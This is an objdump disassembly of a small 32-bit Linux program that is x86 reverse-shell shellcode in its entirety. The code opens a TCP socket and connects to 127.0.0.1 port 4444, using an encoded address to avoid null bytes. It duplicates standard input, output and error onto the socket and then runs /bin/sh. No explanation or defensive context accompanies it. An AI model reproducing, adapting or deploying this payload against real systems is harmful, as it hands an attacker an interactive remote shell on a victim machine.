
a.out:     format de fichier elf32-i386


Déassemblage de la section .text :

08049000 <_start>:
 8049000:	31 c0                	xor    %eax,%eax
 8049002:	b0 66                	mov    $0x66,%al
 8049004:	31 db                	xor    %ebx,%ebx
 8049006:	b3 01                	mov    $0x1,%bl
 8049008:	31 c9                	xor    %ecx,%ecx
 804900a:	51                   	push   %ecx
 804900b:	6a 01                	push   $0x1
 804900d:	6a 02                	push   $0x2
 804900f:	89 e1                	mov    %esp,%ecx
 8049011:	cd 80                	int    $0x80
 8049013:	31 d2                	xor    %edx,%edx
 8049015:	89 c2                	mov    %eax,%edx
 8049017:	b0 66                	mov    $0x66,%al
 8049019:	b3 03                	mov    $0x3,%bl
 804901b:	31 c9                	xor    %ecx,%ecx
 804901d:	68 80 01 01 02       	push   $0x2010180
 8049022:	81 2c 24 01 01 01 01 	subl   $0x1010101,(%esp)
 8049029:	66 68 11 5c          	pushw  $0x5c11
 804902d:	66 6a 02             	pushw  $0x2
 8049030:	89 e6                	mov    %esp,%esi
 8049032:	6a 10                	push   $0x10
 8049034:	56                   	push   %esi
 8049035:	52                   	push   %edx
 8049036:	89 e1                	mov    %esp,%ecx
 8049038:	cd 80                	int    $0x80
 804903a:	b0 3f                	mov    $0x3f,%al
 804903c:	89 d3                	mov    %edx,%ebx
 804903e:	31 c9                	xor    %ecx,%ecx
 8049040:	cd 80                	int    $0x80
 8049042:	b0 3f                	mov    $0x3f,%al
 8049044:	b1 01                	mov    $0x1,%cl
 8049046:	cd 80                	int    $0x80
 8049048:	b0 3f                	mov    $0x3f,%al
 804904a:	b1 02                	mov    $0x2,%cl
 804904c:	cd 80                	int    $0x80
 804904e:	b0 0b                	mov    $0xb,%al
 8049050:	31 db                	xor    %ebx,%ebx
 8049052:	53                   	push   %ebx
 8049053:	68 6e 2f 73 68       	push   $0x68732f6e
 8049058:	68 2f 2f 62 69       	push   $0x69622f2f
 804905d:	89 e3                	mov    %esp,%ebx
 804905f:	31 c9                	xor    %ecx,%ecx
 8049061:	31 d2                	xor    %edx,%edx
 8049063:	cd 80                	int    $0x80
